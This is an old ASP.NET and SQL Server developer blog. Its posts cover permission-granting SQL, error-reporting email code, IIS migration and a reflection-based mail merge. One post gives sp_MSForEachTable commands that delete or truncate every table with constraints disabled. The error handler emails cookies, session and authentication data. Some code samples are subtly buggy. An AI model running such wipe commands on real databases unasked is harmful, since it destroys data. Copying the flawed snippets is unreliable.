  BEGIN

    --Determine the object's type (table/stored procedure) -could 
    --be done using a case too if more objects are added later
    IF @objType = 'P'
    BEGIN
        SET @SQL = 'GRANT EXECUTE ON [' + @Owner + '].[' + @objName  + '] TO ' + @rolename
    END

    IF @objType = 'U'
    BEGIN
        SET @SQL = 'GRANT SELECT ON [' + @Owner + '].[' + @objName  + '] TO ' + @rolename
    END

    -- Execute the SQL statement
    EXEC @Return = sp_executesql @SQL

    -- Get the next row
    FETCH NEXT FROM cursStoredProcedures
    INTO @Owner, @objName, @objType
  END

-- Clean-up after the cursor
CLOSE cursStoredProcedures
DEALLOCATE cursStoredProcedures

-- Check to see if the WHILE loop exited with an error.
IF (@Return = 0)
  BEGIN
    -- Exited fine, commit the permissions
    COMMIT TRAN
  END
ELSE
  BEGIN
    -- Exited with an error, rollback any changes
    ROLLBACK TRAN
    
    -- Report the error
    SET @SQL = 'Error granting permission to ['
    + @Owner + '].[' + @objName + ']'
    RAISERROR(@SQL, 16, 1)
  END
GO
Tuesday, May 01, 2007 8:41:48 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, April 17, 2007

I expect many people already know about this technique but I wanted to share it with those that don’t. The other day I needed to remove all data from a database before importing data from another database. I usually use DTS to copy the data across but knew that the database (one test) had conflicting ids so I decided deleting all the data out of the test database would be the best way to ensure all data’s up to date.

I found this useful little set of SQL at: http://sqljunkies.com/WebLog/roman/archive/2006/03/03/18386.aspx, there are two solutions propsed within the post and comments so here they both are:

Delete the data without resetting the identities

-- disable referential integrity
EXEC sp_MSForEachTable 'ALTER TABLE ? NOCHECK CONSTRAINT ALL'
GO

EXEC sp_MSForEachTable 'DELETE FROM ?'
GO
-- enable referential integrity again
EXEC sp_MSForEachTable 'ALTER TABLE ? CHECK CONSTRAINT ALL'
GO

Delete the data and reset the identities

-- disable referential integrity
EXEC sp_MSForEachTable 'ALTER TABLE ? NOCHECK CONSTRAINT ALL' 
GO 

EXEC sp_MSForEachTable 'TRUNCATE TABLE ?' 
GO 

-- enable referential integrity again 
EXEC sp_MSForEachTable 'ALTER TABLE ? CHECK CONSTRAINT ALL' 
GO
Tuesday, April 17, 2007 4:18:54 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Monday, March 19, 2007

I’ve done a number of posts now on Phil Whinstanley’s error reporting class and this blog appears to be getting a lot of hits because of that which is pretty neat, as a result I’ve had a couple of people write to me asking similar questions about the code so I thought it would be an idea to write a little summary.

Where can I download the code?

It would appear that most of the old copies of Phil’s code have disappeared from the web, I’m not sure why so I’ve uploaded the versions I’ve got below. For convenience I have compiled the code into DLLs for those that don’t know/want to do this and I’ve also included the Visual Studio solutions. I’m not sure if these are based on the original codebase but I don’t think I’ve made any major alterations to these versions:

1 This is a version I was sent as his original including changes and example email was lost...

DLLs only:

If you have Visual Studio:

If you don’t have Visual Studio you can either download one of the above projects and delete the solution/project files or download the original WebException code. Ok, now you have the files :) -FWIW I can accept no responsibility for any of the files or the code, I just zipped them!

How to do I use the WebException class?

I’m now using a slightly modified version of the code to enable error reporting within AJAX (see: Reporting errors from AJAX using the WebException Class) which I’ll try and upload later but whichever version of the code you choose the use is pretty much the same.

Once you have referenced the DLL in your project (see: Importing/Referencing DLLs in Visual Studio) you will be able to use the WebException. As I’ve covered what you need to do to use the code from within an AJAX application in another post (see: Reporting errors from AJAX using the WebException Class) I’ll just cover how to use it to report global errors. To capture and respond to all application errors you will need to place this code within the global.asax, your project should automatically have one, if it doesn’t then you will need to add one.

Using the global.asax file, the first thing you need to do is add a reference to the DLL at the top of your code (this will allow you to call the methods and access the properties):

<%@ Import Namespace="ErrorReporting" %>

Next locate the Application_Error event handler, this is the method that handles all errors within the application (with exception of those thrown from within an AJAX application, read this post to report errors from within an AJAX application). Now replace your Application_Error and Application_PreRequestHandlerExecute handlers with (for more information on what I'm doing here see: ASP.Net WebException and Error Reporting useful code):

void Application_Error(object sender, EventArgs e)
{
    bool reportErrors = Convert.ToBoolean(System.Configuration.ConfigurationManager.AppSettings["SendErrors"]);

    if (reportErrors)
    {
        Exception currentError = Server.GetLastError();

        #region Deal with 404's

        //Redirect the user to a friendly page
        if(CheckForErrorType(currentError, "FileNotFound"))
            RedirectToFriendlyUrl("");

        #endregion
        #region Deal with Spambots

        if (CheckForErrorType(currentError, "System.FormatException"))
        {
            if (HttpContext.Current.Request.Form.Count > 0)
            {
                foreach (string key in HttpContext.Current.Request.Form)
                {
                    if (key.IndexOf("_VIEWSTATE") > 0 && HttpContext.Current.Request.Form[key].ToString().IndexOf("Content-Type") > 0)
                        return;
                }
            }
        }

        #endregion

        //Enable the trace for the duration of the error handling
        TraceContext t = HttpContext.Current.Trace;
        bool bCurrentState = t.IsEnabled;
        t.IsEnabled = true;

        #region Handle the Exception

        ErrorHandling.WebException WE = new ErrorHandling.WebException();
        WE.CurrentException = Server.GetLastError();
        WE.MailFrom = "you@yourdomain.com";
        WE.MailTo = "you@yourdomain.com";
        WE.MailAdmin = "you@yourdomain.com";
        WE.Site = "Your Site's Name or URL";
        WE.SmtpServer = "localhost";
        WE.FloodCount = 10;
        WE.FloodMins = 5;

        #endregion
        #region Choose what you're interested in

        WE.ReturnCache = true;
        WE.DrillDownInCache = true;
        WE.IncludeApplication = true;
        WE.IncludeBrowser = true;
        WE.IncludeEnvironmentVariables = true;
        WE.IncludeForm = true;
        WE.IncludeProcess = true;
        WE.IncludeQueryString = true;
        WE.IncludeRequestCookies = true;
        WE.IncludeRequestHeader = true;
        WE.IncludeResponseCookies = true;
        WE.IncludeServerVariables = true;
        WE.IncludeSession = true;
        WE.IncludeTrace = true;
        WE.IncludeVersions = true;
        WE.IncludeAuthentication = true;

        #endregion

        WE.Handle();

        //Return the trace to its original state
        t.IsEnabled = bCurrentState;

        //Redirect the user to a friendly page
        RedirectToFriendlyUrl("");
    }
}

protected void Application_PreRequestHandlerExecute(Object sender, EventArgs e)
{
    if (Context.Handler is IRequiresSessionState || Context.Handler is IReadOnlySessionState)
        ErrorReporting.SessionTracker.AddRequest("Pre Request Handler Execute"truetruefalse);
}

private bool CheckForErrorType(Exception ex, string errorText)
{
    if (ex != null)
    {
        //Check the exception
        if (ex.GetType().ToString().IndexOf(errorText) > 0)
            return true;
        else
            return CheckForErrorType(ex.InnerException, errorText);
    }
    else
    {
        return false;
    }
}

private void RedirectToFriendlyUrl(string Url)
{
    if (!String.IsNullOrEmpty(Url) && (Request.Url.Host.IndexOf("localhost") < 0))
        Response.Redirect(Url);
}

This will create a new instance of the WebException object, assign the various properties accordingly (you will need to configure these) and then finally handle the error.

That’s it! That’s all you really need to do to have super error reporting instantly installed in your application! If that wasn't enough it's overloaded with a couple of filters for you :). I recommend you read one of my previous posts I’ve added which overviews a few simple tips and tricks when using the WebException class to that improves on its functionality (see: ASP.Net WebException and Error Reporting useful code).

All that's left to do is to test it works (see below).

What should I get from it?

That’s the million dollar question! Once the WebException class has been added to your application you should receive an email every time the application throws an error (which of course means you’ll never get an email from the system!)

View an example of the email you’ll get with all outputs set to true.

More tips/Warnings!

Ok so it’s installed and you’re getting no errors through (because your codes perfect) but there are a couple of other little tweaks I would make to the WebException class to make it a little more useable.

Create a centralised class for it

A while ago I posted a set of “useful” tips for reducing the number of spambot related emails, redirecting the user etc (see: ASP.Net WebException and Error Reporting useful code). That’s fine until you start including the WebException class into multiple projects, managing tweaks to the codebase gets a little cumbersome (i.e. adding the spambot check to all our projects that use the WebException meant a couple of hours of copying and pasting). The work around for me was to wrap it all up into a central static method (see: Reporting errors from AJAX using the WebException Class). I did this rather than fiddling with Phil’s WebException class itself incase he ever got around to releasing another version which would mean a bunch of changes etc.

Limit the page request log

If you have a site where every user is likely to have a high page visit count with most of the pages involving some form of form submission then it may be worth limiting the number of request’s stored as we have found that without limiting these we start receiving very large emails (some topping 10MB).

The reason this is happening is because the session tracker logs all the form elements for the request so if you had i.e. a CMS that submits a page of content every other page request all that data will be stored in the tracker, sticking with the idea of a CMS, your typical text word is around 10bytes (see: How many bytes for...), so say the user writes 500 words per page (which isn’t really a lot) that’s 4.9Kb per form submission plus on the re-display of the page you've got ViewState... That’s just the data submitted by the user, around that, you’ve got all the form fields, field names, session info, query string etc, see how it starts to add up?

The solution is fairly straight forward, what you need to do is alter SessionTracker.cs1:

1I thought I'd done this in a project already but cannot find the source so this may not work.

public class SessionTracker
{
    public static void AddRequest(string Comments, bool DoForm, bool DoQueryString, bool DoCookies)
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        R.Comments = Comments;
        
        if (System.Web.HttpContext.Current != null)
        {
            R.Path = System.Web.HttpContext.Current.Request.Path.ToString();
            if (System.Web.HttpContext.Current.Request.UrlReferrer != null)
            {
                R.Referrer = System.Web.HttpContext.Current.Request.UrlReferrer.ToString();
            }
            if (DoForm)
            {
                R.Form = System.Web.HttpContext.Current.Request.Form;
            }
            if (DoQueryString)
            {
                R.QueryString = System.Web.HttpContext.Current.Request.QueryString;
            }
            if (DoCookies)
            {
                R.Cookies = System.Web.HttpContext.Current.Request.Cookies;
            }
        }

        if (System.Web.HttpContext.Current.Session["RequestCollection"] != null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if(RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public static void AddRequest(string Comments)
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        R.Comments = Comments;
        
        if (System.Web.HttpContext.Current != null)
        {
            R.Path = System.Web.HttpContext.Current.Request.Path.ToString();
            if (System.Web.HttpContext.Current.Request.UrlReferrer != null)
            {
                R.Referrer = System.Web.HttpContext.Current.Request.UrlReferrer.ToString();
            }
            R.Form = System.Web.HttpContext.Current.Request.Form;
            R.QueryString = System.Web.HttpContext.Current.Request.QueryString;
            R.Cookies = System.Web.HttpContext.Current.Request.Cookies;
        }

        if (System.Web.HttpContext.Current.Session["RequestCollection"] != null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if (RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public static void AddRequest()
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        
        if (System.Web.HttpContext.Current.Session["RequestCollection"] == null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if (RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public SessionTracker()
    {
    }
}

Outputting the Trace with the WebException Class

I know this is something I’ve posted about in the past but since moving to version 4 of the code and .Net 2.0 I was no longer getting the trace in my lovely error reports, after a little digging I’ve found a solution, in addition to the code that I posted earlier about enabling the trace using C#, the web.config needs to be set as follows:

<trace enabled="true" requestLimit="100" pageOutput="false" traceMode="SortByTime" localOnly="true" />

Storing the WebException code in App_Code Dir

If you use the WebException class in an ASP.Net 2.0 site, be careful you don’t do what we did and throw the site online uncompiled with a compilation error as it won’t get reported. Luckily I found this issue on a test site but it’s still worth noting.

Personally I wouldn’t put the error reporting code in the App_Code directory as this means you’ll end up needing to maintain a plethora of files throughout various projects. Instead compile a separate DLL and include that in your projects, then if like me you find a nice addition to the error reporting code you can easily update all sites to the latest version!

Setup a simple generic test page

Nothing fancy, just a button that throws an exception will do:

TestErrorPage.aspx

<%@ Page Language="C#" %>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
    protected void btnError_Click(object sender, EventArgs e)
    {
        throw new ArgumentException("Test Error");
    }
</script>

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <title>Test Error Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <p><asp:Button runat="server" ID="btnError" Text="Throw Error" OnClick="btnError_Click" /></p>
    </div>
    </form>
</body>
</html>

Happy Error Reporting :) -I'm hoping this is the last time I need to blog about this code but what's the betting another post is around the corner ;)

Monday, March 19, 2007 7:34:20 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, March 13, 2007

Get your finger on the pulse of your site with this great new (free) RSS statistics servicePulseRSS”. I met the developers of PulseRSS the other day at my first Multipack meet (West Midlands based new media meet) which, if you’re nearby you should check out in the future as they’re a lovely bunch of guys (and girls apparently but they were no-where to be seen on Saturday).

Back to PulseRSS! As already mentioned, PulseRSS is a statistics service via an RSS/XML feed that works in a very similar way to Google Analytics but unlike Google Analytics, they’ve followed the principle of KISS which I think works really well, the interface is simple and easy to use and have I already mentioned it was free?

So if you’re looking for a simple free statistics package then check out PulseRSS –I’ve got it running on my blog already so it’ll be interesting to see how the stats compare to Google Analytics...

Pulse Logo

Tuesday, March 13, 2007 10:45:25 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, March 12, 2007

Another post from Doug Setzer from 27Seconds.com :)


At my "day job", the systems guys are building new Windows 2003 servers to upgrade our aging Windows 2000 servers.  The plan is to:
 - Build the new Windows 2003 server
 - Install IIS
 - Install .NET
 - Run the IIS migration tool from the old Win2k server

That all went as well as could go - little things got mixed up and had to be corrected.  But, the server would let you request plain HTML files and ASPX files, but classic ASP pages were returned blank.  In poking around Google and the server, we came to find that we had to enable ASP content via:
 - IIS Manager
 - Web Services Extensions
 - Specifically allow Active Server Pages

But, we were still having the same issues.  Stopping and restarting IIS didn't help. Nor did a server reboot.

I found a blog post that mentioned checking that the ASP ISAPI has the correct path.  It tried a random thought that Microsoft has changed the default name of the "Windows"/"Winnt" folder -- Windows NT4, 2000, etc. all use "Winnt", where as Windows 2003 uses the "Windows" folder.  Sure enough, double checking the path to the ASP ISAPI had the wrong path and fixing this path fixed our issues with classic ASP files.

Monday, March 12, 2007 10:49:09 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Friday, March 09, 2007

This morning Julian Voelcker came to me with an interesting issue that I’ve looked into before but I’ve never really looked into a re-useable solution. Seeing as it’s fun Friday I thought why not ;)

The scenario: I would like to offer my users a custom mail merge facility where by they can insert values stored in the database such as their name. The selection of columns is unlikely to be changed and if it does then I’ll be the one to do it. There are about 20 fields to choose from.

Easy enough, in the past I’ve kept it to a minimum and then just done a simple find and replace on the body i.e.:

//Create a dataset and add some test columns
DataTable dt = new DataTable();
dt.Columns.Add("Name");
dt.Columns.Add("Email");

#region Add some test data

DataRow dr = dt.NewRow();
dr["Name"] = "Julian";
dr["Email"] = "julian@email.com";
dt.Rows.Add(dr);

dr = dt.NewRow();
dr["Name"] = "Tim";
dr["Email"] = "tim@email.com";
dt.Rows.Add(dr);

#endregion

#region Create the example email body

string emailBody = "<p>This is a test email to {{Name}} that would be sent to the email address: {{Email}}.</p>";

#endregion

#region Do the work

//Loop through the rows
for (int i = 0; i < dt.Rows.Count; i++)
{
    //Get the data row for this instance
    DataRow row = dt.Rows[i];

    //Create a new body as this'll be updated for each user
    string body = String.Empty;

    //Update the body
    body = emailBody.Replace("##Name##", row["Name"]);
    body = body.Replace("##Email##", row["Email"]);

    litOutput.Text += String.Format("{0}<hr />", body);
}

#endregion

The issue I see with this however is (among others) having 20 fields is a lot to be doing with a find/replace statement as it wouldn’t be very elegant and a nightmare to manage. Sticking with this method of using a dataset I suggested we use a regular expression to match the field delimiters and do a replace that way:

//Create a dataset and add some test columns
DataTable dt = new DataTable();
dt.Columns.Add("Name");
dt.Columns.Add("Email");

#region Add some test data

DataRow dr = dt.NewRow();
dr["Name"] = "Julian";
dr["Email"] = "julian@email.com";
dt.Rows.Add(dr);

dr = dt.NewRow();
dr["Name"] = "Tim";
dr["Email"] = "tim@email.com";
dt.Rows.Add(dr);

#endregion

#region Create the example email body

string emailBody = "<p>This is a test email to {{Name}} that would be sent to the email address: {{Email}}.</p>";

#endregion

#region Do the work

//Loop through the rows
for (int i = 0; i < dt.Rows.Count; i++)
{
    //Get the data row for this instance
    DataRow row = dt.Rows[i];

    MatchEvaluator replaceField = delegate(Match m)
    {
        return row[m.Groups[1].ToString()].ToString();
    };

    //Create a new body as this'll be updated for each user
    string body = String.Empty;
    //Find the fields
    Regex r = new Regex(@"{{(\w{0,15}?)}}");
    body = r.Replace(emailBody, replaceField);

    litOutput.Text += String.Format("{0}<hr />", body);
}

#endregion

This is alright and in many ways very scaleable. I’m not a fan of DataSets but in this instance it works nicely and does mean expanding the available fields at a later date would just be a matter of adding columns to the query.

How does this relate to accessing a property of an object using a string value instead? Well there was a catch, Julian wasn’t using a DataSet and didn’t want to, he had a collection of custom objects all ready and waiting. As he uses a code generator to generate his Data Access Layer and Business Logic Layer there was a method already exposed allowing you to search for a property by string but it's not a standard .Net method so I decided to work out how it was done.

The solution it turned out was a really rather elegant solution IMHO. Using reflection you can use the same concept as above but with custom objects and Robert is your father’s wife’s sister:

Reflection.aspx

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="Reflection.aspx.cs" Inherits="Reflection" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <title>Untitled Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <h1>Reflection Demo</h1>
        <p>Choose from the following fields to build up your email message, the valid fields are (you can choose whether to use non-valid fields as a test if you like):</p>
        <ul>
            <li>Id</li>
            <li>Email</li>
            <li>Name</li>
            <li>JoinedDate</li>
        </ul>
        <p><asp:CheckBox ID="chkCaseSensitive" runat="server" Text="Make the property search case insensitive" /></p>
        <p><label for="txtEmailBody">Example email body:</label><br />
        <asp:TextBox runat="server" ID="txtEmailBody" TextMode="MultiLine" style="width: 500px; height: 200px;" /></p>
        <p><small>HTML submissions are not allowed and they're encoded anyways so no point in spamming -not that you were going to of course!</small></p>
        <p><asp:Button runat="server" ID="btnSubmit" Text="Merge It!" OnClick="btnSubmit_Click" /></p>
        <asp:Literal ID="litOutput" runat="server" />
    </div>
    </form>
</body>
</html>

Reflection.aspx.cs

using System;
using System.Data;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

using System.Text.RegularExpressions;
using System.Collections.Generic;
using System.Reflection;

public class TestObject
{
    private int __Id;
    private string __Name;
    private string __Email;
    private DateTime __JoinedDate;

    public int Id
    {
        get
        {
            return __Id;
        }
        set
        {
            __Id = value;
        }
    }
    public string Name
    {
        get
        {
            return __Name;
        }
        set
        {
            __Name = value;
        }
    }
    public string Email
    {
        get
        {
            return __Email;
        }
        set
        {
            __Email = value;
        }
    }
    public DateTime JoinedDate
    {
        get
        {
            return __JoinedDate;
        }
        set
        {
            __JoinedDate = value;
        }
    }

    public TestObject(int id, string name, string email, DateTime joinedDate)
    {
        __Id = id;
        __Name = name;
        __Email = email;
        __JoinedDate = joinedDate;
    }

    public bool GetPropertyValueByName(string propertyName)
    {
        object obj = null;
        return this.GetPropertyValueByName(propertyName, falseref obj);
    }

    public bool GetPropertyValueByName(string propertyName, ref object val)
    {
        return this.GetPropertyValueByName(propertyName, falseref val);
    }

    public bool GetPropertyValueByName(string propertyName, bool caseInsensitive, ref object val)
    {
        PropertyInfo p = null;
        BindingFlags flags = BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic;

        //If it's a case-insensitive search then add the flag
        if (caseInsensitive)
            flags = flags | BindingFlags.IgnoreCase;

        p = this.GetType().GetProperty(
               propertyName,
               flags,
               null,
               null,
               Type.EmptyTypes,
               null);

        //Check the property exists and that it has read access
        if (p != null && p.CanRead)
        {
            //There is a property that matches the name, we can read it so get it
            val = this.GetType().InvokeMember(
                propertyName,
                BindingFlags.GetProperty | flags,
                null,
                this,
                null);

            //We return true as the user may just want to check that it exists
            return true;
        }

        return false;
    }
}

public partial class Reflection : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
        {
            #region Create the example email body

            txtEmailBody.Text = "Dear {{Name}},\r\n\r\nThis is a test email that would be sent to the email address: {{Email}}.\r\n\r\n{{Name}} joined on: {{JoinedDate}}. This field should not be found {{Don't Find Me}}\r\n\r\nRegards,\r\n\r\nThe webmaster.";

            #endregion
        }
    }

    protected void btnSubmit_Click(object sender, EventArgs e)
    {
        if (Page.IsValid && !String.IsNullOrEmpty(txtEmailBody.Text))
        {
            litOutput.Text = "<h2>Output</h2>";

            #region Perform some basic tests
            litOutput.Text += "<h3>Perform some basic tests:</h3>";
            TestObject testObject = new TestObject(1"Tim""tim@email.com", DateTime.Today);

            object obj = null;
            if (testObject.GetPropertyValueByName("id"falseref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("name"trueref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("joineddate"trueref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            if (testObject.GetPropertyValueByName("nothere"trueref obj))
                litOutput.Text += String.Format("<li>{0}</li>", obj);
            else
                litOutput.Text += "<li>Doesn't Exist</li>";

            #endregion

            #region Create a collection and add a couple of items

            List<TestObject> testObjects = new List<TestObject>();
            testObjects.Add(new TestObject(1"Tim""tim@email.com", DateTime.Parse("01/02/2007")));
            testObjects.Add(new TestObject(2"Jim""jim@email.com", DateTime.Parse("20/02/2007")));
            testObjects.Add(new TestObject(3"John""john@email.com", DateTime.Parse("02/03/2007")));
            testObjects.Add(new TestObject(4"Gill""gill@email.com", DateTime.Parse("01/04/2007")));
            testObjects.Add(new TestObject(5"Bill""bill@email.com", DateTime.Parse("11/02/2007")));

            #endregion

            #region Do the work

            //Format it with <pre> for simplicity
            litOutput.Text += "<h3>Now for the reflection example:</h3><hr /><pre>";

            //Loop through the rows
            foreach (TestObject t in testObjects)
            {
                MatchEvaluator replaceField = delegate(Match m)
                {
                    //Get the property name (depending on your regex but
                    //mine groups the squigly brackets in there incase
                    //a match can't be found
                    string pName = m.Groups[2].ToString();

                    //Check it's not null
                    if (!String.IsNullOrEmpty(pName))
                    {
                        //Create an object that'll be returned from the method
                        object o = null;
                        //Check if that property exists, if it does return it
                        if (t.GetPropertyValueByName(pName, chkCaseSensitive.Checked, ref o))
                            return o.ToString();
                    }
                    //We've not found a match for the property in the object
                    //so return the match instead as it's probably a mistake
                    return m.Value;
                };

                //Create a new body as this'll be updated for each user
                string body = String.Empty;

                //Find the fields within the main body -this can be any of the properties of the object
                Regex r = new Regex(@"({{)(\w{0,15}?)(}})");
                body = r.Replace(txtEmailBody.Text, replaceField);
                //Output the example content (HtmlEncoded so not to hurt us!!)
                litOutput.Text += String.Format("{0}<hr />", Server.HtmlEncode(body));
            }

            litOutput.Text += "</pre>";

            #endregion
        }
    }
}

I’ve thrown up a quick demo if you want to test it out. I think in the longer run I’m going to look into having it generate some form of reporting system as that’d be seriously nice, but the suns out and I need to go for a paddle so that’ll have to wait for another day! So that's my first delve into reflection and so far I love it!

Friday, March 09, 2007 5:12:02 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 

I’ve been using Phil Whinstanley’s error reporting class1 within my applications for some time now and it really does help with diagnosing issues with the site’s during development (or client testing) but also alerting me to errors on live sites. I also like it because it can highlight hacking attempts and also spambot form submissions –allowing you to alter the site as needed. A lot of the time it also means we’re alerted to an issue with the site before the client has a chance to call.

1 Note: I've been told the files Phil put online all those years ago are offline but don't panic, I'm posting another post with the relevant files shortly. If you don't want to use the search function (top right) or you're just keen, check out my comment within my post about ASP.Net WebException and Error Reporting useful code.

I’m glad he developed it because before this was around I was using a very simple email alert system that didn’t contain even a third of what this one does. Historically in ASP we always reported 500-100 errors as I don’t like clients spotting issues before I do. It’s very important to include error reporting in your code otherwise you may miss a sequence of events that causes your client to loose out on a sale.

Recently however we got in on the Atlas/AJAX scene pretty early on because we had a new application that would really benefit from a lack of postback and as it was an internal application only where we had complete control over the user’s environment, accessibility wasn’t so much of a concern (though FWIW you can still use the site in the same way without JavaScript activated).

At present, our development server’s SMTP server isn’t working properly so I didn’t think anything of receiving no email when I threw an exception during the early stages of development but as soon as I threw it onto the live server I quickly noticed that I wasn’t receiving errors from the application (we’ve got a test page to ensure the error reporting is working as expected), on investigation I found that the errors were being caught by the Atlas/AJAX handler (in a similar way to a try/catch block) which meant no emails were being sent out –so what do you do?

Note: Since I first started this article, Atlas has been released by Microsoft and is now AJAX and as part of the current release, Atlas/AJAX allows you to capture errors that are otherwise trapped by the framework and handle them as you like but for completeness I’ll overview things I tried.

Firstly I tried simply bubbling the error up to the global.asax’s Application_Error event handler as I normally would but that won’t work as it will still be trapped by the Atlas/AJAX framework, further more, the error returned to the user isn’t very useful (it’s the text within the exception):

Example standard Atlas/AJAX error - a pretty useless error message as far as the user is concerned!

The next thing I tried was taking the exception and passing it to the WebException as you do within the Application_Error event handler, although this worked and for this project would have been an alright solution because the ScriptManager was contained within a single MasterPage, I wanted a solution that I could easily roll out to other projects.

What I decided to do in the end was to wrap the WebException class and adding a single static method that takes an exception, then I replaced the code within the Global.asax and within the ScriptManager’s error event handler and responded to the user with a more informative message. The code below will output a user friendly message -still in a popup though you could redirect if desired. In the live application the user's location and a reference for the incoming error email is also shown to the user.

Note: TSDGlobals is a settings class we use here, it just references the relevant setting and contains a set of useful methods that we use throughout most of our projects.

aspx code

<asp:ScriptManager runat="server" ID="sm" EnablePartialRendering="true" AllowCustomErrorsRedirect="true" OnAsyncPostBackError="atlasScriptManager_PageError"></asp:ScriptManager>

codebehind

protected void atlasScriptManager_PageError(object sender, AsyncPostBackErrorEventArgs e)
{
    //A page reference for you (optional but useful)
    string __PageRef = "132";
    //Update the message the user will see
    sm.AsyncPostBackErrorMessage = String.Format("I'm sorry,  an error has occured, please contact us on 01234 567890. Quoting Page Ref: {0} - {1}", __PageRef, DateTime.Now.ToString());
    //Pass it through to the new Error Handler
    ErrorHandling.ErrorHandler.Handle(e.Exception);
}

global.asax

void Application_Error(object sender, EventArgs e)
{
    ErrorHandling.ErrorHandler.Handle(Server.GetLastError());
}

protected void Application_PreRequestHandlerExecute(Object sender, EventArgs e)
{
    if (Context.Handler is IRequiresSessionState || Context.Handler is IReadOnlySessionState)
        ErrorReporting.SessionTracker.AddRequest("Pre Request Handler Execute"truetruefalse);
}

ErrorHandler.cs

using System;
using System.Data;
using System.Configuration;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

namespace ErrorHandling
{
    public class ErrorHandler
    {
        //Declare for the scope of the class
        private static HttpRequest context = HttpContext.Current.Request;

        public static void Handle(Exception currentError)
        {
            Handle(currentError, true);
        }

        public static void Handle(Exception currentError, bool redirectUser)
        {
            if (TSDGlobals.SendSiteErrors)
            {
                #region Deal with 404's

                //Redirect the user to a friendly page
                if (CheckForErrorType(currentError, "FileNotFound") && redirectUser)
                    RedirectToFriendlyUrl(TSDGlobals.ErrorPage_PageNotFound);

                #endregion
                #region Deal with Spambots

                //Check the error type
                if (CheckForErrorType(currentError, "System.FormatException"))
                {
                    if (context.Form.Count > 0)
                    {
                        foreach (string key in context.Form)
                        {
                            if (key.IndexOf("_VIEWSTATE") > 0 && context.Form[key].ToString().IndexOf("Content-Type") > 0)
                                return;
                        }
                    }
                }

                #endregion

                //Enable the trace for the duration of the error handling
                TraceContext t = HttpContext.Current.Trace;
                bool bCurrentState = t.IsEnabled;
                t.IsEnabled = true;

                #region Handle the Exception

                WebException WE = new WebException();
                WE.CurrentException = currentError;
                WE.Site = context.Url.Host.ToString();
                //Pull the information from the web.config here if desired
                WE.FloodCount = 50;
                WE.FloodMins = 5;

                #endregion
                #region Choose what you're interested in

                WE.ReturnCache = true;
                WE.DrillDownInCache = true;
                WE.IncludeApplication = true;
                WE.IncludeBrowser = true;
                WE.IncludeEnvironmentVariables = true;
                WE.IncludeForm = true;
                WE.IncludeProcess = true;
                WE.IncludeQueryString = true;
                WE.IncludeRequestCookies = true;
                WE.IncludeRequestHeader = true;
                WE.IncludeResponseCookies = true;
                WE.IncludeServerVariables = true;
                WE.IncludeSession = true;
                WE.IncludeTrace = true;
                WE.IncludeVersions = true;
                WE.IncludeAuthentication = true;

                #endregion

                WE.Handle();

                //Return the trace to its original state
                t.IsEnabled = bCurrentState;

                //Redirect the user to a friendly page
                if (redirectUser)
                    RedirectToFriendlyUrl(TSDGlobals.ErrorPage_CodeIssue);
            }
        }

        private static bool CheckForErrorType(Exception ex, string errorText)
        {
            if (ex != null)
            {
                //Check the exception
                if (ex.GetType().ToString().IndexOf(errorText) > 0)
                    return true;
                else
                    return CheckForErrorType(ex.InnerException, errorText);
            }
            else
            {
                return false;
            }
        }

        private static void RedirectToFriendlyUrl(string Url)
        {
